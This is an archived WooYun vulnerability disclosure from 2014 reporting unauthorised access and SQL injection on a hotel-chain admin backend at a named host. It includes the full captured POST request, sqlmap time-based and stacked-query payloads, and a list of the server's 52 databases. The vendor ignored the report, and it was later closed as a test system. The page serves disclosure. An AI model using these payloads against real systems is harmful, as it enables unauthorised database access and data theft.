乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2014-10-29: 细节已通知厂商并且等待厂商处理中 2014-11-03: 厂商已经主动忽略漏洞,细节向公众公开
~~求邀请码
后台地址:http://df.wyn88.com:8087/
1. 未授权访问,这里不需要登入就可以直接测试
2. SQL注入 积分查询测试
burp抓包 post 请求
POST /home/SearchCent HTTP/1.1Host: df.wyn88.com:8087Proxy-Connection: keep-aliveContent-Length: 32Accept: application/json, text/javascript, */*; q=0.01Origin: http://df.wyn88.com:8087X-Requested-With: XMLHttpRequestUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36Content-Type: application/x-www-form-urlencodedDNT: 1Referer: http://df.wyn88.com:8087/home/SearchCentAccept-Encoding: gzip,deflate,sdchAccept-Language: zh-CN,zh;q=0.8,en-US;q=0.6,en;q=0.4Cookie: LXB_REFER=www.google.com; Hm_lvt_ae8bddcb177c34849249800dc684ac2c=1414414368,1414414373; Hm_lpvt_ae8bddcb177c34849249800dc684ac2c=1414414854RA-Ver: 2.7.0RA-Sid: 65E7C870-20141014-044958-a23ba1-b78bccass_cardno=015684&page=1&rows=50
sqlmap:
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: POSTParameter: ass_cardno Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries Payload: ass_cardno=015684; WAITFOR DELAY '0:0:5'--&page=1&rows=50 Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind Payload: ass_cardno=015684 WAITFOR DELAY '0:0:5'--&page=1&rows=50---web server operating system: Windows 2008 R2 or 7web application technology: ASP.NET 4.0.30319, ASP.NET, Microsoft IIS 7.5back-end DBMS: Microsoft SQL Server 2008current database: 'ftdata'available databases [52]:[*] [OperationData][*] [WynCmsDB!][*] CenterCRM[*] ConvertToPMSThd[*] CRM_MPS_duibi[*] DBStorage[*] DW_VIENNA[*] ftdata[*] jira[*] master[*] Member[*] model[*] msdb[*] PmsBase[*] PmsBase_20140915[*] PmsBase_Open[*] PmsBase_Train[*] PmsBusiness[*] PmsBusiness_20140915[*] PmsBusiness_C[*] PmsBusiness_History[*] PmsBusiness_Open[*] PmsBusine
数据库Member table
其他的就不列了,表挺多的
求邀请码
危害等级:无影响厂商忽略
忽略时间:2014-11-03 15:50
2015-01-26:测试系统,已关闭